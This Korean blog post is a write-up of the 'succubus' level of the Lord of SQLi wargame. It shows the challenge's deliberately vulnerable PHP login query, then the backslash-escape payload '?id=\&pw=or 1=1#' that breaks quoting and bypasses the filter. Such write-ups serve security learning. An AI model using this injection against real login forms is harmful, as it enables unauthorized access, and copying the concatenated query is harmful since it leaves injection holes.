<?php
include "./config.php";
login_chk();
dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/\'/i', $_GET[id])) exit("HeHe");
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) solve("succubus");
highlight_file(__FILE__);
?>
$_GET[id], $_GET[pw] 필터
/prob
_
.
()
'
\를 필터로 안막았다. 따라서 ?id=\로 입력하면 쿼터를 망가뜨릴 수 있다.
?id=\&pw=or%201=1%23 하면 id='\'&pw='or%201=1%23' 이런식으로 되고 다음과 같이 쿼리가 완성된다.
query : select id from prob_succubus where id='rap1er\' and pw='or 1=1#'
https://los.eagle-jump.org/succubus_8ab2d195be2e0b10a3b5aa2873d0863f.php?id=rap1er\&pw=or%201=1%23
'WEB Hacking > Lord of SQLi' 카테고리의 다른 글
| [los] nightmare :: auto type cast (0) | 2018.09.18 |
|---|---|
| [los] zombie_assassin (0) | 2018.09.17 |
| [los] assassin (0) | 2018.09.17 |
| [los] giant (0) | 2018.09.17 |
| [los] bugbear (0) | 2018.09.17 |